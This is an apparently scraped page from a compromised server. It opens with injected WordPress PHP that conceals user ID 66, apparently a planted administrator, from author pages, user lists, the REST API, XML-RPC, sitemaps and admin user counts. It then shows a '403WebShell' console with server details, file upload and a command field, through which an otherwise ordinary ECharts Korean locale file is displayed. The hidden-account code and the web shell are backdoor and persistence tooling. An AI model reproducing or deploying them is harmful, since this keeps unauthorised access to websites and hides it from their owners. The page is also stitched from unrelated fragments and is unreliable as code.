add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/reef_analytics/node_modules/echarts/lib/i18n/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/reef_analytics/node_modules/echarts/lib/i18n/langKO.js
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements.  See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership.  The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License.  You may obtain a copy of the License at
*
*   http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied.  See the License for the
* specific language governing permissions and limitations
* under the License.
*/


/**
 * AUTO-GENERATED FILE. DO NOT MODIFY.
 */

/*
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 *   http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied.  See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */
/**
 * Language: Korean.
 */
export default {
  time: {
    month: ['1월', '2월', '3월', '4월', '5월', '6월', '7월', '8월', '9월', '10월', '11월', '12월'],
    monthAbbr: ['1월', '2월', '3월', '4월', '5월', '6월', '7월', '8월', '9월', '10월', '11월', '12월'],
    dayOfWeek: ['일요일', '월요일', '화요일', '수요일', '목요일', '금요일', '토요일'],
    dayOfWeekAbbr: ['일', '월', '화', '수', '목', '금', '토']
  },
  legend: {
    selector: {
      all: '모두 선택',
      inverse: '선택 범위 반전'
    }
  },
  toolbox: {
    brush: {
      title: {
        rect: '사각형 선택',
        polygon: '올가미 선택',
        lineX: '수평 선택',
        lineY: '수직 선택',
        keep: '선택 유지',
        clear: '선택 지우기'
      }
    },
    dataView: {
      title: '날짜 보기',
      lang: ['날짜 보기', '닫기', '새로 고침']
    },
    dataZoom: {
      title: {
        zoom: '확대/축소',
        back: '확대/축소 초기화'
      }
    },
    magicType: {
      title: {
        line: '꺽은선 그래프로 변경',
        bar: '막대 그래프로 변경',
        stack: '스택',
        tiled: '타일'
      }
    },
    restore: {
      title: '복구'
    },
    saveAsImage: {
      title: '이미지로 저장',
      lang: ['이미지를 저장하려면 마우스 오른쪽 버튼을 클릭하세요.']
    }
  },
  series: {
    typeNames: {
      pie: '원 그래프',
      bar: '막대 그래프',
      line: '꺽은선 그래프',
      scatter: '산점도',
      effectScatter: '물결 효과 산점도',
      radar: '방사형 그래프',
      tree: '트리',
      treemap: '트리맵',
      boxplot: '상자 수염 그래프',
      candlestick: '캔들스틱 차트',
      k: 'K 라인 차트',
      heatmap: '히트 맵',
      map: '지도',
      parallel: '평행 좌표 맵',
      lines: '선',
      graph: '관계 그래프',
      sankey: '산키 다이어그램',
      funnel: '깔때기형 그래프',
      gauge: '계기',
      pictorialBar: '픽토그램 차트',
      themeRiver: '스트림 그래프',
      sunburst: '선버스트 차트',
      custom: '맞춤 차트',
      chart: '차트'
    }
  },
  aria: {
    general: {
      withTitle: '"{title}"에 대한 차트입니다.',
      withoutTitle: '차트입니다.'
    },
    series: {
      single: {
        prefix: '',
        withName: ' 차트 유형은 {seriesType}이며 {seriesName}을 표시합니다.',
        withoutName: ' 차트 유형은 {seriesType}입니다.'
      },
      multiple: {
        prefix: '. {seriesCount} 하나의 차트 시리즈로 구성됩니다.',
        withName: ' {seriesId}번째 시리즈는 {seriesName}을 나타내는 {seriesType} representing.',
        withoutName: ' {seriesId}번째 시리즈는 {seriesType}입니다.',
        separator: {
          middle: '',
          end: ''
        }
      }
    },
    data: {
      allData: '데이터: ',
      partialData: '첫번째 {displayCnt} 아이템: ',
      withName: '{name}의 데이터는 {value}',
      withoutName: '{value}',
      separator: {
        middle: ', ',
        end: '. '
      }
    }
  }
};

Youez - 2016 - github.com/yon3zu
LinuXploit